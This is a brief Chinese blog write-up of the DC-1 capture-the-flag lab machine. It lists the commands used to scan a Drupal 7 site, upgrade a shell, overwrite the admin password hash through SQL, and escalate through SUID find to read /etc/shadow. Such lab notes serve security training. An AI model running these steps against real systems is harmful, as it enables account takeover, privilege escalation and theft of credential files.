靶机DC-1的通关笔记

nmap -A -sC -sS -n -Pn -vvv -oN DC-1  192.168.1.156

droopescan scan drupal -u 192.168.1.156

python -c 'import pty;pty.spawn("/bin/bash")'   #优化终端

https://www.drupal.org/node/1023428

./scripts/password-hash.sh 12345

UPDATE users SET pass='$S$DZyKe31ZRwS4msLQYHacPaiIpOZIwHsblIeObnCuz4o3OeGDMblJ' where uid=1;

find flag1.txt -exec cat /etc/shadow \;

最后总结：

　　1.droopescan扫描工具的使用

　　2.优化终端 python -c 'import pty;pty.spawn("/bin/bash")'

　　3.drupal 7 默认数据库配置文件/sites/default/settings.php 以及修改密码的方法 https://www.drupal.org/node/1023428

　　4.find的suid提权方法

　　5.还有一个疑问drupal的版本到底是多少呢？在reports下的status report找到了版本号7.24

　　6.我真菜

posted @ 2020-04-16 20:51 木讷叶阅读(387) 评论(0) 编辑收藏举报

刷新页面返回顶部

(-夜-)